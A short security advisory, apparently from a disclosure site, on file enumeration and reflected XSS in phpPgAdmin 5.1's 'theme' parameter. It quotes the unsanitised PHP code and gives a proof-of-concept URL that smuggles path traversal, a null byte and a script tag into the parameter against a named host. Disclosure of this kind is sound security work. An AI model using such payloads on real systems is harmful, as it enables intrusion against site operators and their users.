phpPgAdmin-5.1 file enumeration && XSS

2019.08.22
pl Krzysztof Rurka (PL) pl
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#Exploit Title: phpPgAdmin-5.1 file enumeration && XSS #Exploit Author: Krzysztof Rurka #Vendor Homepage: https://sourceforge.net/projects/phppgadmin/?source=typ_redirect #Software Link: https://sourceforge.net/projects/phppgadmin/?source=typ_redirect #Version: 5.1 #CVE:n/a ..\phpPgAdmin-5.1\libraries\lib.inc.php [102] ... if (isset($_REQUEST['theme']) && is_file("./themes/{$_REQUEST['theme']}/global.css")) { /* save the selected theme in cookie for a year */ setcookie('ppaTheme', $_REQUEST['theme'], time()+31536000); $_theme = $_SESSION['ppaTheme'] = $conf['theme'] = $_REQUEST['theme']; } ... THX: Ten eksploit dedykuję wujkowi Andżejowi, dzięki tobie posiadłęm tę niezwykłą wiedzę na temat XSS-ów POC: http://psql.media4u.home.pl/psql/?theme=../index.php%00"/><script>alert(1)</script>


See this note in RAW Version
Vote for this issue:
66%
34%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top